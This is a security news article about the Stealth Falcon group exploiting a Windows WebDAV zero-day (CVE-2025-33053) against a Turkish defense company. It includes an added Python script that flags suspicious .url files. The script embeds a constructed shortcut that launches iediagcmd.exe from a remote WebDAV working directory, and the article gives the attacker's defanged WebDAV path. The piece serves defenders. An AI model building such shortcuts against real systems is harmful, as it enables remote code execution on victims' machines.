APT Hackers Exploited Windows WebDAV 0-Day RCE Vulnerability in the Wild to Deploy Malware

A sophisticated cyberattack campaign by the advanced persistent threat group Stealth Falcon exploited a previously unknown zero-day vulnerability to target a major Turkish defense company and execute malware remotely.
The attack leveraged CVE-2025-33053, a remote code execution vulnerability that allows threat actors to manipulate the working directory of legitimate Windows tools to execute malicious files from attacker-controlled WebDAV servers.
Microsoft released a security patch for this vulnerability as part of its June Patch Tuesday updates, following a responsible disclosure by Check Point Research.
The vulnerability was exploited through a malicious .url file named “TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.url” (Turkish for “TLM.005 TELESCOPIC MAST DAMAGE REPORT.pdf.url”), which was likely distributed as an archived attachment in a spear-phishing email targeting the Turkish defense contractor.
The .url file pointed to iediagcmd.exe, a legitimate Internet Explorer diagnostics utility, but manipulated the working directory to reference an attacker-controlled WebDAV server at “\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr”.
This technique abused the search order used by the .NET Process.Start() method, which resolves a bare program name against the current working directory, so the legitimate tool executed files from the remote server instead of the system copies.
This allowed arbitrary code execution through process hollowing, as the malicious route.exe spawned from the WebDAV server bypassed traditional signature-based defenses.
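As an added example (not part of the article or of Check Point's research), the following Python triage script parses a Windows .url file and flags the combination described above: a URL that names a local executable together with a WorkingDirectory that resolves to a UNC or WebDAV path, plus the document-then-.url double extension used for the lure. The two shortcut samples are constructed, and the host in the second one is a placeholder rather than real infrastructure.

```python
"""Static triage of Windows .url (Internet Shortcut) files for the
remote-working-directory pattern. Added example, not Check Point's or
Microsoft's tooling; sample shortcuts below are constructed."""
import re
from configparser import ConfigParser

# Path fragments the Windows WebDAV Mini-Redirector uses (host@ssl@port,
# DavWWWRoot). A WorkingDirectory containing them resolves over the network.
WEBDAV_MARKERS = ("@ssl", "davwwwroot")
EXECUTABLE_RE = re.compile(r"\.(exe|com|scr|bat|cmd)\s*$", re.IGNORECASE)
DOCUMENT_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".rtf", ".txt")


def parse_url_file(text: str) -> dict:
    """Return the [InternetShortcut] keys of a .url file, lower-cased.
    .url files are INI-style; ConfigParser lower-cases option names by
    default, and interpolation is disabled so backslashes survive."""
    cp = ConfigParser(interpolation=None)
    cp.read_string(text)
    if not cp.has_section("InternetShortcut"):
        return {}
    return dict(cp.items("InternetShortcut"))


def is_remote_path(path: str) -> bool:
    r"""True for UNC paths (\\host\share) or WebDAV-style host paths."""
    p = path.strip().strip('"').lower().replace("/", "\\")
    return p.startswith("\\\\") or any(m in p for m in WEBDAV_MARKERS)


def has_deceptive_double_extension(filename: str) -> bool:
    """e.g. report.pdf.url: a document extension placed just before .url."""
    low = filename.lower()
    return low.endswith(".url") and low[:-4].endswith(DOCUMENT_EXTS)


def assess_url_file(text: str, filename: str = "") -> dict:
    """Classify one .url file; returns verdict plus the individual findings."""
    fields = parse_url_file(text)
    url = fields.get("url", "")
    workdir = fields.get("workingdirectory", "")
    findings = []
    # A shortcut whose URL names a local executable (rather than an
    # http(s) resource) behaves like a launcher, not a bookmark.
    if EXECUTABLE_RE.search(url) or url.lower().startswith("file:"):
        findings.append("url_targets_local_executable")
    # The launched program's working directory sits on a remote server, so a
    # bare name it resolves relative to "." is fetched from that server.
    if workdir and is_remote_path(workdir):
        findings.append("workingdirectory_is_remote")
    if filename and has_deceptive_double_extension(filename):
        findings.append("deceptive_double_extension")
    core = {"url_targets_local_executable", "workingdirectory_is_remote"}
    if core.issubset(findings):
        verdict = "malicious-pattern"
    elif findings:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "findings": findings,
            "url": url, "workingdirectory": workdir}


# Constructed sample: an ordinary bookmark.
BENIGN_SAMPLE = """[InternetShortcut]
URL=https://www.example.com/
"""

# Constructed sample mirroring the pattern in the article; the WebDAV host
# is a placeholder, not the real infrastructure.
SUSPECT_SAMPLE = """[InternetShortcut]
URL=C:\\Program Files\\Internet Explorer\\iediagcmd.exe
WorkingDirectory=\\\\webdav-host.example@ssl@443\\DavWWWRoot\\stage
"""

if __name__ == "__main__":
    for name, body in (("bookmark.url", BENIGN_SAMPLE),
                       ("report.pdf.url", SUSPECT_SAMPLE)):
        print(name, assess_url_file(body, name))
```

The script runs offline against archived attachments or mail-gateway extracts; the "malicious-pattern" verdict requires both the local-executable URL and the remote WorkingDirectory, so ordinary bookmarks and shortcuts to local tools with local working directories are not flagged.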

APT Hackers Exploited WebDAV Zero-Day
Stealth Falcon, also known as FruityArmor, is an advanced persistent threat group that has been conducting cyber espionage operations since at least 2012.
The group primarily targets high-profile entities in the Middle East and Africa, with recent operations observed against government and defense sectors in Turkey, Qatar, Egypt, and Yemen.
The attack delivered a multi-stage infection chain, culminating in the deployment of “Horus Agent,” a custom-built implant for the Mythic command and control framework, according to Check Point Research.
Named after the Egyptian falcon-headed sky god, Horus Agent represents an evolution from the group’s previously used customized Apollo implant. The malware employs advanced anti-analysis techniques, including code virtualization, string encryption, and API hashing, to evade detection.
Beyond the initial implant, researchers identified several previously undisclosed custom tools in Stealth Falcon’s arsenal, including a DC Credential Dumper that bypasses file locks by accessing virtual disk copies, a passive backdoor that listens for incoming shellcode execution requests, and a custom keylogger with RC4 encryption.
The Horus Agent focuses on essential reconnaissance functions, allowing threat actors to fingerprint victim machines and assess their value before deploying more advanced payloads. This approach helps protect the group’s sophisticated post-exploitation tools from exposure.
Stealth Falcon consistently uses repurposed legitimate domains purchased through the NameCheap registrar, typically in the .net or .com top-level domains. This strategy helps its infrastructure blend in with legitimate traffic, complicating attribution efforts.
The group’s continued evolution demonstrates its commitment to maintaining stealth and resilience in its operations, employing commercial code obfuscation tools and custom modifications that make its payloads difficult to reverse-engineer and track over time.
This latest campaign highlights the ongoing threat posed by sophisticated APT groups, which combine zero-day exploits with innovative attack vectors, such as WebDAV manipulation, to target critical infrastructure and defense organizations worldwide.
The post APT Hackers Exploited Windows WebDAV 0-Day RCE Vulnerability in the Wild to Deploy Malware appeared first on Cyber Security News.